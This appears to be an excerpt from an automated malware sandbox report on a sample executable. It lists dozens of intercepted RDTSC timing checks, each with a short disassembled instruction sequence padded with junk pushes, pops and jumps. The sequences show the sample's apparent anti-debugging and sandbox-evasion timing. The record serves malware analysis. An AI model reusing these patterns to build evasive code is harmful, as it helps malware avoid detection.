      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C01F19 second address: C01F24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C00906 second address: C00921 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA398518356h 0x00000008 jmp 00007FA398518361h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C00921 second address: C00930 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FA398747046h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C00A5E second address: C00A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA398518356h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C00A68 second address: C00A70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C011AA second address: C011B4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA398518367h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C014A8 second address: C014AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C018BB second address: C018CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 jc 00007FA398518360h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C01D6E second address: C01D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007FA398747046h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C078B2 second address: C078B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C078B6 second address: C078C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA398747046h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C070ED second address: C070F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA398518356h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C070F9 second address: C0713A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA398747057h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA398747058h 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0713A second address: C07140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C072A0 second address: C072CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FA398747048h 0x00000013 pushad 0x00000014 jo 00007FA398747046h 0x0000001a pushad 0x0000001b popad 0x0000001c jbe 00007FA398747046h 0x00000022 popad 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C072CC second address: C072EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518366h 0x00000007 jl 00007FA398518362h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C072EC second address: C072F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0BC2B second address: C0BC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0BC2F second address: C0BC62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA398747057h 0x0000000b pushad 0x0000000c jmp 00007FA398747053h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0BDDE second address: C0BDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0BDE3 second address: C0BDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0BDE9 second address: C0BDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0C09C second address: C0C0AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0C0AA second address: C0C0B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0C0B1 second address: C0C0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C0C0B7 second address: C0C0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA398518356h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10C52 second address: C10C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 ja 00007FA398747046h 0x0000000c jp 00007FA398747046h 0x00000012 jns 00007FA398747046h 0x00000018 popad 0x00000019 pop ebx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007FA398747046h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10C77 second address: C10C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FA398518368h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10E0F second address: C10E19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10E19 second address: C10E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10E1D second address: C10E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10F9C second address: C10FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10FA0 second address: C10FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10FB3 second address: C10FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10FB9 second address: C10FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C10FBF second address: C10FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC4669 second address: BC466D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C114D7 second address: C114DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1161A second address: C11622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C11622 second address: C1162D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1162D second address: C11631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C11631 second address: C11652 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA398518363h 0x0000000d jnc 00007FA398518356h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C11652 second address: C11656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C12051 second address: C12090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FA398518368h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007FA398518356h 0x00000014 popad 0x00000015 pop esi 0x00000016 pushad 0x00000017 jmp 00007FA398518362h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C157AC second address: C157CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA39874704Ah 0x00000009 jmp 00007FA398747050h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C15913 second address: C15930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398518366h 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C15D1C second address: C15D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C15D27 second address: C15D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C15D2B second address: C15D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C15D2F second address: C15D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1D8EE second address: C1D8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1D8F4 second address: C1D908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FA39851835Eh 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1D908 second address: C1D911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1B84C second address: C1B851 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1B851 second address: C1B873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398747055h 0x00000009 pop esi 0x0000000a jnp 00007FA398747052h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1B9ED second address: C1B9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1B9F1 second address: C1BA0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747055h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1BA0C second address: C1BA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1BA12 second address: C1BA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1BE63 second address: C1BE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA39851835Eh 0x0000000b jmp 00007FA39851835Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1BE86 second address: C1BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1D346 second address: C1D34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1D34A second address: C1D359 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FA39874704Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C1D359 second address: C1D368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FA398518356h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C260DC second address: C260E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA398747046h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C263FD second address: C2640A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FA398518356h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2640A second address: C26410 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C26573 second address: C2657C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2657C second address: C2659A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA398747057h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C268D8 second address: C268DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C26CEC second address: C26CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C26CFF second address: C26D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C26D05 second address: C26D1D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA39874704Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA398747046h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C26D1D second address: C26D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2CF34 second address: C2CF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398747055h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2CF4D second address: C2CF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D0AD second address: C2D0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D0B1 second address: C2D0EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007FA398518356h 0x00000010 jne 00007FA398518356h 0x00000016 jc 00007FA398518356h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007FA398518356h 0x00000025 jmp 00007FA39851835Ah 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D370 second address: C2D38F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747056h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D38F second address: C2D395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D395 second address: C2D3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D3A4 second address: C2D3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D841 second address: C2D845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D845 second address: C2D84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D995 second address: C2D9A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D9A6 second address: C2D9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA39851835Ah 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D9B6 second address: C2D9CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA39874704Eh 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D9CE second address: C2D9D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2D9D2 second address: C2D9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2DC5D second address: C2DC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2E479 second address: C2E47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C2E47D second address: C2E489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FA398518356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C361B5 second address: C361D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C35F40 second address: C35F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C3D3C2 second address: C3D3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C4661D second address: C46623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C46623 second address: C46627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C46627 second address: C46645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA398518360h 0x0000000b js 00007FA398518362h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C46645 second address: C4664B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C46330 second address: C46336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
